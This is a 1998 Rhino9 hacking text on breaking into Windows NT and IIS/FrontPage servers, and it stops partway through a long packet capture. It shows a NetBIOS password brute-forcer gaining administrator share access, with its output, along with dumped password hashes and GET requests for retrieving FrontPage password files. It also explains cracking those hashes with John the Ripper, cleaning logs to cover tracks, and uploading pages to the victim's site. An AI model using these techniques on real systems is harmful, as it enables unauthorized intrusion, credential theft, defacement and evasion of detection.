==========Windows NT Vulnerabilities Version 2==================================
by Vacuum & Chame|eon of Rhino9
[www.rhino9.org]
[http://www.technotronic.com -- vacuum@technotronic.com]
March 11,1998
Nothing changed in this updated version other than a few minor spelling errors
and irrelevant information removed. Enjoy.
Frontpage (Hacking) Don't Let Others fool you chame|eon and I were the first to
decrypt service.pwd files.
NetBIOS Shares in depth.
All mentioned programs available at www.technotronic.com
==========NetBIOS Attack Program==================================
Verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server,
NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
OPTIONS
-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.
<address>
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.
Note that NAT.EXE will ip scan for netbios shares as performed above.
Comparing NAT.EXE to Microsoft's own executables:
C:\nbtstat -A 204.73.131.11
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Here is a partial NetBIOS 16th bit listing:
Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name
Computername <03> UNIQUE Registered by the messenger service. This is the computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
<BF> Network Monitor Name
<BE> Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client
C:\net view 204.73.131.11
Shared resources at 204.73.131.11
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.
C:\net use /?
The syntax of this command is:
NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
C:\net use x: \\204.73.131.11\test
The command completed successfully.
C:\unzipped\nat10bin>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \\204.73.131.11\test Microsoft Windows Network
OK \\204.73.131.11\test Microsoft Windows Network
The command completed successfully.
C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:
[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If Default share of Everyone/Full Control. Done it is hacked.
==========Frontpage Extension Scanner & Cracker========================
NOTE: This is the pwdump from the webserver the Lan Manager password is set to "password".
Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
mari:1006:********************************:********************************:::
meng:1007:********************************:********************************:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::
The #haccess.ctl file:
# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
Executing fpservwin.exe allows frontpage server extensions to be installed on
port 443 (HTTPS)Secure Sockets Layer
port 80 (HTTP)
NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used
instead of Frontpage.
The following is a list of the Internet Information server files location
in relation to the local hard drive (C:) and the web (www.target.com)
C:\InetPub\wwwroot <Home>
C:\InetPub\scripts /Scripts
C:\InetPub\wwwroot\_vti_bin /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut
C:\InetPub\cgi-bin /cgi-bin
C:\InetPub\wwwroot\srchadm /srchadm
C:\WINNT\System32\inetserv\iisadmin /iisadmin
C:\InetPub\wwwroot\_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin
NOTE: If Index Information Server running under Internet Information Server.
service.pwd is our goal, although lots of servers are not password protected
and can be exploited easily. queryhit.htm if found can be used to get service.pwd
search for
"#filename=*.pwd"
Systems by default will have ftp service running.
C:\InetPub\ftproot is the default location for the ftp service which
by default runs on the standard port 21.
Select the Allow Anonymous Connections check box to allow users using the username "anonymous" to log into your FTP server. Use the User Name and Password dialog boxes to establish the Windows NT user account to use for permissions for all anonymous connections. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within Windows NT ; anonymous users do not log on using this user name and password.
Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions.
When you installed Internet Information Server, Setup created the account IUSR_computername in the Windows NT User Manager for Domains and in Internet Service Manager. This account was assigned a random password for both in Internet Service Manager and in the Windows NT User Manager for Domains. If you change the password, you must change it in both places and make sure it matches.
FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to:
service.pwd contains the list of users and passwords for the FrontPage web.
service.grp contains the list of groups (one group for authors and one for administrators in FrontPage).
On Netscape servers, there are no service.grp files. The Netscape password files are:
administrators.pwd for administrators
authors.pwd for authors and administrators
users.pwd for users, authors, and administrators
NOTE: Name and password are case sensitive
Scanning PORT 80 or 443 options:
GET /_vti_inf.html #Ensures that frontpage server extensions
are installed.
GET /_vti_pvt/service.pwd #Contains the encrypted password files.
Not used on IIS and WebSite servers
GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted
names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log #If author.log is there it will need to
be cleaned to cover your tracks
GET /samples/search/queryhit.htm
Other ways of obtaining service.pwdhttp://ftpsearch.com/index.html
search for service.pwdhttp://www.alstavista.digital.com
advanced search for link:"/_vti_pvt/service.pwd"
Attempt to connect to the server using FTP.
port 21
login anonymous
password guest@unknown
the anonymous login will use the internally created IISUSR_computername
account to assign NT permissions.
An incorrect configuration may leave areas vulnerable to attack.
If service.pwd is obtained it will look similar to this:
Vacuum:SGXJVl6OJ9zkE
The above password is apple
Turn it into DES format:
Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash
The run your favorite unix password cracker like John The Ripper
Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]
Flags: -pwfile:<file>[,..] specify passwd file(s) (wildcards allowed)
-wordfile:<file> specify wordlist file
-restore[:<file>] restore session [from <file>]
-user:login|uid[,..] only crack this (these) user(s)
-timeout:<time> abort session after a period of <time> minutes
-incremental[:<mode>] incremental mode [using JOHN.INI entry <mode>]
-single single crack mode
-stdin read words from stdin
-list list each word
-test perform a benchmark
-beep beep when a password is found
-quiet do not beep when a password is found (default)
-noname don't use memory for login names
Other ways of obtaining service.pwd
http://ftpsearch.com/index.html
search for service.pwd
http://www.alstavista.digital.com
advanced search for link:"/_vti_pvt/service.pwd"
To open a FrontPage web
On the FrontPage Explorer’s File menu, choose Open FrontPage Web.
In the Getting Started dialog box, select Open an Existing FrontPage
Web and choose the FrontPage web you want to open.
Click More Webs if the web you want to open is not listed.
Click OK.
If you are prompted for your author name and password, you will have
to decrypt service.pwd, guess or move on.
Enter them in the Name and Password Required dialog box, and click OK.
Alter the existing page, or upload a page of your own.
I have captured the entire hack from connection, to password authentication,
to the actual page upload.
To view this file, you will need to use Windows NT's Network monitor
and open the file vac.cap
=====Sniffing ==============================================================
Running a packet sniffer to see the actual determining of shares:
NOTE: R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..)
This frame is a NetShareEnum request, which requests a list of shared resources.
19 31.348 STUDENT7 *SMBSERVER R_SRVSVC RPC Client call srvsvc:NetrShareEnum(..) STUDENT7 *SMBSERVER IP
FRAME: Base frame properties FRAME: Time of capture = Dec 3, 1997 9:12:54.18
FRAME: Time delta from previous physical frame: 0 milliseconds
FRAME: Frame number: 19 FRAME: Total frame length: 238 bytes
FRAME: Capture frame length: 238 bytes
FRAME: Frame data: Number of data bytes remaining = 238 (0x00EE)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C9D
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C93
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 238 (0x00EE)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 224 (0x00E0)
IP: ID = 0x1A08; Proto = TCP; Len: 224 IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0)
IP: Precedence = Routine IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability IP: Total Length = 224 (0xE0)
IP: Identification = 6664 (0x1A08) IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control IP: Checksum = 0x415E
IP: Source Address = 204.73.131.19
IP: Destination Address = 204.73.131.11
IP: Data: Number of data bytes remaining = 204 (0x00CC)
TCP: .AP..., len: 184, seq: 73409249-73409432, ack: 1505236, win: 8278, src: 1832 dst: 139 (NBT Session)
TCP: Source Port = 0x0728 TCP: Destination Port = NETBIOS Session Service
TCP: Sequence Number = 73409249 (0x46022E1)
TCP: Acknowledgement Number = 1505236 (0x16F7D4)
TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize TCP: .......0 = No Fin
TCP: Window = 8278 (0x2056) TCP: Checksum = 0x40ED
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 184 (0x00B8)
NBT: SS: Session Message, Len: 180 NBT: Packet Type = Session Message
NBT: Packet Flags = 0 (0x0) NBT: .......0 = Add 0 to Length
NBT: Packet Length = 180 (0xB4)
NBT: SS Data: Number of data bytes remaining = 180 (0x00B4)
SMB: C transact TransactNmPipe, FID = 0x800 SMB: SMB Status = Error Success
SMB: Error class = No Error SMB: Error code = No Error
SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x00C0 UID = 0x0800
SMB: Tree ID (TID) = 2048 (0x800)
SMB: Process ID (PID) = 31936 (0x7CC0)
SMB: User ID (UID) = 2048 (0x800)
SMB: Multiplex ID (MID) = 192 (0xC0)
SMB: Flags Summary = 24 (0x18)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 0....... = Client command
SMB: flags2 Summary = 32771 (0x8003)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS capabilities
SMB: ..0............. = No paging of IO
SMB: .0.............. = Using SMB status codes
SMB: 1............... = Using UNICODE strings
SMB: Command = R transact SMB: Word count = 16
SMB: Word parameters SMB: Total parm bytes = 0
SMB: Total data bytes = 96 SMB: Max parm bytes = 0
SMB: Max data bytes = 1024 SMB: Max setup words = 0 (0x0)
SMB: Transact Flags Summary = 0 (0x0)
SMB: ...............0 = Leave session intact
SMB: ..............0. = Response required
SMB: Transact timeout = 0 (0x0) SMB: Parameter bytes = 0 (0x0)
SMB: Parameter offset = 84 (0x54) SMB: Data bytes = 96 (0x60)
SMB: Data offset = 84 (0x54) SMB: Max setup words = 2
SMB: Setup words
SMB: Pipe function = Transact named pipe (TransactNmPipe)
SMB: File ID (FID) = 2048 (0x800) SMB: Byte count = 113
SMB: Byte parameters SMB: File name = \PIPE\
SMB: Transaction data
SMB: Data: Number of data bytes remaining = 96 (0x0060)
MSRPC: c/o RPC Request: call 0x1 opnum 0xF context 0x0 hint 0x48
MSRPC: Version = 5 (0x5) MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Request MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation MSRPC: Fragment Length = 96 (0x60)
MSRPC: Authentication Length = 0 (0x0) MSRPC: Call Identifier = 1 (0x1)
MSRPC: Bind Frame Number = 17 (0x11)
MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
MSRPC: Allocation Hint = 72 (0x48)
MSRPC: Presentation Context Identifier = 0 (0x0)
MSRPC: Operation Number (c/o Request prop. dg header prop) = 15 (0xF)
MSRPC: Stub DataR_SRVSVC: RPC Client call srvsvc:NetrShareEnum(..)
R_SRVSVC: SRVSVC_HANDLE ServerName = 204.73.131.11
R_SRVSVC: LPSHARE_ENUM_STRUCT InfoStruct {..}
R_SRVSVC: DWORD Level = 1 (0x1)
R_SRVSVC: _SHARE_ENUM_UNION ShareInfo {..}
R_SRVSVC: Switch Value = 1 (0x1)
R_SRVSVC: SHARE_INFO_1_CONTAINER *Level1 {..}
R_SRVSVC: DWORD EntriesRead = 0 (0x0)
R_SRVSVC: LPSHARE_INFO_1 Buffer = 0 (0x0)
R_SRVSVC: DWORD PreferedMaximumLength = 4294967295 (0xFFFFFFFF)
00000: 00 C0 4F C4 8C 9D 00 C0 4F C4 8C 93 08 00 45 00 ..O.....O.....E.
00010: 00 E0 1A 08 40 00 80 06 41 5E CC 49 83 13 CC 49 ....@...A^.I...I
00020: 83 0B 07 28 00 8B 04 60 22 E1 00 16 F7 D4 50 18 ...(...`".....P.
00030: 20 56 40 ED 00 00 00 00 00 B4 FF 53 4D 42 25 00 V@........SMB%.
00040: 00 00 00 18 03 80 24 82 00 00 00 00 00 00 00 00 ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 00 10 00 00 60 00 00 .....|.......`..
00060: 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 54 ...............T
00070: 00 60 00 54 00 02 00 26 00 00 08 71 00 00 5C 00 .`.T...&...q..\.
00080: 50 00 49 00 50 00 45 00 5C 00 00 00 00 2D 05 00 P.I.P.E.\....-..
00090: 00 03 10 00 00 00 60 00 00 00 01 00 00 00 48 00 ......`.......H.
000A0: 00 00 00 00 0F 00 36 1C 14 00 0E 00 00 00 00 00 ......6.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 01 00 00 00 A0 FB 12 00 00 00 ................
000E0: 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 ..............
This is the response to the above share request:
27 31.376 *SMBSERVER STUDENT7 R_SRVSVC RPC Server response srvsvc:NetrServerGetInfo(..) *SMBSERVER STUDENT7 IP
FRAME: Base frame properties FRAME: Time of capture = Dec 3, 1997 9:12:54.46
FRAME: Time delta from previous physical frame: 7 milliseconds
FRAME: Frame number: 27 FRAME: Total frame length: 230 bytes
FRAME: Capture frame length: 230 bytes
FRAME: Frame data: Number of data bytes remaining = 230 (0x00E6)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C93
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C9D
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 230 (0x00E6)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 216 (0x00D8)
IP: ID = 0x3C0E; Proto = TCP; Len: 216 IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0)
IP: Precedence = Routine IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability IP: Total Length = 216 (0xD8)
IP: Identification = 15374 (0x3C0E) IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control IP: Checksum = 0x1F60
IP: Source Address = 204.73.131.11
IP: Destination Address = 204.73.131.19
IP: Data: Number of data bytes remaining = 196 (0x00C4)
TCP: .AP..., len: 176, seq: 1506074-1506249, ack: 73409903, win: 7314, src: 139 (NBT Session) dst: 1832
TCP: Source Port = NETBIOS Session Service TCP: Destination Port = 0x0728
TCP: Sequence Number = 1506074 (0x16FB1A)
TCP: Acknowledgement Number = 73409903 (0x460256F)
TCP: Data Offset = 20 (0x14) TCP: Reserved = 0 (0x0000)
TCP: Flags = 0x18 : .AP... TCP: ..0..... = No urgent data
TCP: ...1.... = Acknowledgement field significant
TCP: ....1... = Push function TCP: .....0.. = No Reset
TCP: ......0. = No Synchronize TCP: .......0 = No Fin
TCP: Window = 7314 (0x1C92) TCP: Checksum = 0x7C1E
TCP: Urgent Pointer = 0 (0x0)
TCP: Data: Number of data bytes remaining = 176 (0x00B0)
NBT: SS: Session Message, Len: 172 NBT: Packet Type = Session Message
NBT: Packet Flags = 0 (0x0) NBT: .......0 = Add 0 to Length
NBT: Packet Length = 172 (0xAC)
NBT: SS Data: Number of data bytes remaining = 172 (0x00AC)
SMB: R transact TransactNmPipe (response to frame 26)
SMB: SMB Status = Error Success SMB: Error class = No Error
SMB: Error code = No Error
SMB: Header: PID = 0x7CC0 TID = 0x0800 MID = 0x01C0 UID = 0x0800
SMB: Tree ID (TID) = 2048 (0x800)
SMB: Process ID (PID) = 31936 (0x7CC0)
SMB: User ID (UID) = 2048 (0x800)
SMB: Multiplex ID (MID) = 448 (0x1C0)
SMB: Flags Summary = 152 (0x98)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 1....... = Server response
SMB: flags2 Summary = 32771 (0x8003)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS capabilities
SMB: ..0............. = No paging of IO
SMB: .0.............. = Using SMB status codes
SMB: 1............... = Using UNICODE strings
SMB: Command = R transact SMB: Word count = 10
SMB: Word parameters SMB: Total parm bytes = 0
SMB: Total data bytes = 116 SMB: Parameter bytes = 0 (0x0)
SMB: Parameter offset = 56 (0x38)
SMB: Parameter Displacement = 0 (0x0)
SMB: Data bytes = 116 (0x74) SMB: Data offset = 56 (0x38)
SMB: Data Displacement = 0 (0x0) SMB: Max setup words = 0
SMB: Byte count = 117 SMB: Byte parameters
SMB: Pipe function = Transact named pipe (TransactNmPipe)
SMB: Data: Number of data bytes remaining = 116 (0x0074)
MSRPC: c/o RPC Response: call 0x1 context 0x0 hint 0x5C cancels 0x0
MSRPC: Version = 5 (0x5) MSRPC: Version (Minor) = 0 (0x0)
MSRPC: Packet Type = Response MSRPC: Flags 1 = 3 (0x3)
MSRPC: .......1 = Reserved -or- First fragment (AES/DC)
MSRPC: ......1. = Last fragment -or- Cancel pending
MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
MSRPC: Packed Data Representation MSRPC: Fragment Length = 116 (0x74)
MSRPC: Authentication Length = 0 (0x0) MSRPC: Call Identifier = 1 (0x1)
MSRPC: Bind Frame Number = 25 (0x19)
MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
MSRPC: Allocation Hint = 92 (0x5C)
MSRPC: Presentation Context Identifier = 0 (0x0)
MSRPC: Cancel Count = 0 (0x0) MSRPC: Reserved = 0 (0x0)
MSRPC: Stub DataR_SRVSVC: RPC Server response srvsvc:NetrServerGetInfo(..)
R_SRVSVC: LPSERVER_INFO InfoStruct {..}
R_SRVSVC: Switch Value = 101 (0x65)
R_SRVSVC: LPSERVER_INFO_101 ServerInfo101 {..}
R_SRVSVC: DWORD sv101_platform_id = 500 (0x1F4)
R_SRVSVC: LPTSTR sv101_name = 1363784 (0x14CF48)
R_SRVSVC: DWORD sv101_version_major = 4 (0x4)
R_SRVSVC: DWORD sv101_version_minor = 0 (0x0)
R_SRVSVC: DWORD sv101_type = 266251 (0x4100B)
R_SRVSVC: LPTSTR sv101_comment = 1363812 (0x14CF64)
R_SRVSVC: LPTSTR sv101_name = 204.73.131.11
R_SRVSVC: LPTSTR sv101_comment =
R_SRVSVC: Return Value = 0 (0x0)
00000: 00 C0 4F C4 8C 93 00 C0 4F C4 8C 9D 08 00 45 00 ..O.....O.....E.
00010: 00 D8 3C 0E 40 00 80 06 1F 60 CC 49 83 0B CC 49 ..<.@....`.I...I
00020: 83 13 00 8B 07 28 00 16 FB 1A 04 60 25 6F 50 18 .....(.....`%oP.
00030: 1C 92 7C 1E 00 00 00 00 00 AC FF 53 4D 42 25 00 ..|........SMB%.
00040: 00 00 00 98 03 80 24 82 00 00 00 00 00 00 00 00 ......$.........
00050: 00 00 00 08 C0 7C 00 08 C0 01 0A 00 00 74 00 00 .....|.......t..
00060: 00 00 00 38 00 00 00 74 00 38 00 00 00 00 00 75 ...8...t.8.....u
00070: 00 48 05 00 02 03 10 00 00 00 74 00 00 00 01 00 .H........t.....
00080: 00 00 5C 00 00 00 00 00 00 00 65 00 00 00 30 CF ..\.......e...0.
00090: 14 00 F4 01 00 00 48 CF 14 00 04 00 00 00 00 00 ......H.........
000A0: 00 00 0B 10 04 00 64 CF 14 00 0E 00 00 00 00 00 ......d.........
000B0: 00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00 ......2.0.4...7.
000C0: 33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00 3...1.3.1...1.1.
000D0: 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 ................
000E0: 16 00 00 00 00 00 ......
Frontpage Sniff:
Below you notice the NTLM authentication process and that an application called
X-vermeer-urlencoded is the utility that is encrypting our LM password. An option
within IIS "Windows NT Challeng/Response" is turned on in the following example.
21 30.856 00C04FC48C8F STUDENT7 HTTP POST Request (from client using port 1140) 204.73.131.18 STUDENT7 IP
FRAME: Base frame properties
FRAME: Time of capture = Dec 1, 1997 17:56:55.389
FRAME: Time delta from previous physical frame: 2 milliseconds
FRAME: Frame number: 21 FRAME: Total frame length: 433 bytes
FRAME: Capture frame length: 433 bytes
FRAME: Frame data: Number of data bytes remaining = 433 (0x01B1)
ETHERNET: ETYPE = 0x0800 : Protocol = IP: DOD Internet Protocol
ETHERNET: Destination address : 00C04FC48C93
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00C04FC48C8F
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 433 (0x01B1)
ETHERNET: Ethernet Type : 0x0800 (IP: DOD Internet Protocol)
ETHERNET: Ethernet Data: Number of data bytes remaining = 419 (0x01A3)
IP: ID = 0xB805; Proto = TCP; Len: 419 IP: Version = 4 (0x4)
IP: Header Length = 20 (0x14) IP: Service Type = 0 (0x0)
IP: Precedence = Routine IP: ...0.... = Normal Delay
IP: ....0... = Normal Throughput
IP: .....0.. = Normal Reliability IP: Total Length = 419 (0x1A3)
IP: Identification = 47109 (0xB805) IP: Flags Summary = 2 (0x2)
IP: .......0 = Last fragment in datagram
IP: ......1. = Cannot fragment datagram
IP: Fragment Offset = 0 (0x0) bytes IP: Time to Live = 128 (0x80)
IP: Protocol = TCP - Transmission Control IP: Checksum = 0xA296
IP: Source Address = 204.73.131.18
IP: Destination Address = 204.73.131.19
IP: Data: Number of data bytes remaining = 399 (0x018F)
TCP: .AP..., len: 379, seq: 705525-705903, ack: 4115388, win: 8760, src: 1140 dst: 80
TCP: Source Port = 0x0474
TCP: Destination Port = Hypertext Transfer Protocol
TCP: Sequence Number = 705525 (0xAC3F5)
TCP: Acknowledgement Number = 4115388 (0x3ECBBC)
